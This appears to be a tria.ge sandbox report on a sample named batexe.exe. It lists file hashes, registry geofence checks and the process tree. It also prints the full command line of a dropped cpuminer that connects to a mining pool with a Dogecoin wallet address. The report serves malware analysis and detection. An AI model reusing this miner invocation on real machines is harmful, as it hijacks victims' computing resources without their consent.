Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
294s -
max time network
299s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
11/02/2024, 19:43
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 5012 b2e.exe 4760 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 4760 cpuminer-sse2.exe 4760 cpuminer-sse2.exe 4760 cpuminer-sse2.exe 4760 cpuminer-sse2.exe 4760 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/5804-8-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 5804 wrote to memory of 5012 5804 batexe.exe 85 PID 5804 wrote to memory of 5012 5804 batexe.exe 85 PID 5804 wrote to memory of 5012 5804 batexe.exe 85 PID 5012 wrote to memory of 5492 5012 b2e.exe 86 PID 5012 wrote to memory of 5492 5012 b2e.exe 86 PID 5012 wrote to memory of 5492 5012 b2e.exe 86 PID 5492 wrote to memory of 4760 5492 cmd.exe 89 PID 5492 wrote to memory of 4760 5492 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5804 -
C:\Users\Admin\AppData\Local\Temp\5F18.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\5F18.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5F18.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\61F6.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:5492 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4760
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.0MB
MD50d92d9fa564bf498f57b3570b547590f
SHA13b50360e9d6c16bc5af3d9452d6b0a48b6cb3717
SHA25628211e70b12e3476160845d6e14c63e0cc70f97eb1446ec21566e7e9bfde2a1e
SHA512beaa958739cabcf466f6a7f90a687efc580624c6538cfc7937dc526be2d474981ee95000c55e3e2013beeb28cdd3d444659da818f969ea131542fce30d2773a0
-
Filesize
3.2MB
MD5a27a472833af38ebcec50d9d68ca5bfd
SHA1a237bbb1cf3685d497469ec27627dbb09cc323fe
SHA256019d8b6b866ef20bf48c3ade7d8f82de2b5fbedbd9addf2229a0cbfeb8996c21
SHA51277aea69ee1e6dee322a4145ba6c26db46cf87dccbd62d9c75c456ac06fdc19d42277e9f36d57253db147de0a66ae85a82fd7493b9af922e85ef4dc565451bae7
-
Filesize
5.1MB
MD52ec88d89e99b465384b322cdeafaee28
SHA15f4ddf80350a1d995b06b00989530bbb61c7572c
SHA256412ec2beb8d3c7dbd797fb81052e3b22d812b38477467706b6aedddf8141d7c5
SHA5123fbf8f048d5749c4b331577cb29f070fff02be314324e104af0f9f8a4fd05d85c7ba000d79a2201220363da70e60cf8e12b3512a0bc63747bc08eb7f2699c61d
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
886KB
MD5d482c9617891b7820c2981cc2f167961
SHA10acc9f902d516cbbeef511e887d496d637673539
SHA25628e3c73338cbd4d51a07c14ca1da67a7cc464696c8a2ca0aadf9d5a9a20e7d9c
SHA512e482d15315c74680056d1bde6b7c2f0c20143c4eaee799fed5c3684c2fb09edab195e31ff2d9022adcc08153f9599ce2c5d12d3c944455c2a45ba5c201a175db
-
Filesize
636KB
MD5e146263765e0391e1bc021aa8ff74404
SHA1e878f29a4dc68f80e765b468a64120d7b86319b8
SHA256fec94b583fe68ef38715176252504a87ae67a248f713698de04b940f5007a27e
SHA5120bd026ed8287dbf3accf687dfea89015d1fcd0931d4a700c17c925b9201d5861a5f20bec1bee67a9327f32e2671d431509a2223826a0e8a77bbff0589d0bab14
-
Filesize
698KB
MD52d38ae80b8a6d28d95e7d68a47f305f6
SHA18e322eb6c75d83ffdc706cf921b0e5c5917da2e3
SHA2569ceba50ee1ffb4e7db4b3bc2cca49a6f1cd4b9ec27bb13298fc27af97d85abd6
SHA512ed23536df785fe48d3a1eee4ceb2913304b048fb95bb9cc425cfa3787f0f5f2f0026b248a318ce8d90d953b18a36e02f9fb9f6562b838b4c6b80e42ea256ae1e
-
Filesize
614KB
MD5bbdcfaae1fccf33708f88ff47fe39949
SHA14a3b9ce69a61a0eca5042a0767feede7fb4a70d9
SHA25618e14a5c37d9d760838aaadf03fb58f7feb414dfd89db5b50fd5470c5489a406
SHA5123722610bdd38de8a6f2f048bfe39ecc0fb6b5b94413d0c676f5f699878aaceca07b45fd691c140e7b038c55d7c427fb7e40625b54ce00259cbd02a9fc21c3b30
-
Filesize
743KB
MD5c47fd9b293813763ff33099094960849
SHA142dbbed3bbf32a812c99ffefcfb848155b217232
SHA2567ce1785c3916a47257bf716ce3f67a26e53e95a4a7511a98fff14789985902f3
SHA512f35db1c9ee59b8e2438a7429937b044629df08489785be9711d856e7212a1c814f5f4e439e7fba2495ea33119caffe88a516650eb07d1e3864bb64d55ad08599
-
Filesize
448KB
MD5655c39fb383b8ec156c1bb0233208f48
SHA1d9303754de3262d00bb3880f684cb4403980e620
SHA25680c23d92c5924298cac1a9cc66a00751ef05d488c9cfa1f089f7cca715f70607
SHA5120cbd8fde23a2cce742400030925e6e24d85c11edce5fe7aa70ba5316e5022a0bd598761268d921ea87bfb5f37aab05bba219b3deb076c66bd21b04c021f1f5f8
-
Filesize
745KB
MD563744eb54278002b2681842ca31c7553
SHA1c255310fb4a762c94f02f2373017049c3d4a9bf0
SHA2562bfe6a044e74564bb8edba56ac80a67790dff8b5401f48f096b4e26830a9600c
SHA5129a7c06947b353fb2b5f0d08a7b41e8744bd60bb9add6cdfe6894da88b96e813fd2f705e40dd7d1a215a09294c9770d4a2d9cc07e94c81aa2c7f46a4bf108ac1c
-
Filesize
462KB
MD5dfddbe712a8ad4f884d7c8788016c8b8
SHA13d938cb2944dec55d17ff0101e73496183b6fa4a
SHA2568e3f117f4204442d380b477d172d1c16c96b7e6c6c706fa76234b5813c9212c6
SHA51203f7e9d400bcc9a09aca1afaf93ce4ff557e8c3ecdc2c9da098b0d5a249a396707d9c8ac14789d4aabfbb6d19cc5dbcf07f15b41964ca49e208e80d875e7b8d3
-
Filesize
483KB
MD5d9af634940e74681a34cebcc75e66e9b
SHA1cc507f5f2cc66ceb753f139f82f6e4931fea5771
SHA2564d38d7e860adf7a10416d50178f6624e0a033739d7199c5ebc467475fe437547
SHA512d065f3db44913b7cc873c563acb3c452f1d046d41c63eac2dc34e7b82e0c7c0ec9e73ff504660e1800f6cc57830531838a7a02c06e9efda39ef0677d77277e31
-
Filesize
445KB
MD5c1e8af0ac33a55e0a03e78798d496d67
SHA1a375656c5f77fa35894a0e667ca1fee02f86548a
SHA256b76b3360946b8d13ce7a3283bb0e3e617d9f61b46d6af4634ab7466322cb9a16
SHA512d68cc2feb4202e296e6a3f1fdd03949cd20ccd684cd85490886696fdd7c9537e86f513b629ee60355c723c762a1b61d48621e61eef34ff7901a3789020a15bbb
-
Filesize
514KB
MD5a6ddfcd70f9e035fc1da16703205fc2c
SHA1692921172c317bab9394c2abdd3f28ffdb87f881
SHA256d84cce6c299a807150b19b99a43c243a5f17a641b63cb479e39d0d70223dbb7e
SHA51241156428114187ccf1ebe2f920d46dd151fb50ac1a94bfcd3a8d3ea6503425e5196c564827b2ec3a2f5c8352e5f3f0a9b4e218f58d263592e8f69356757f3559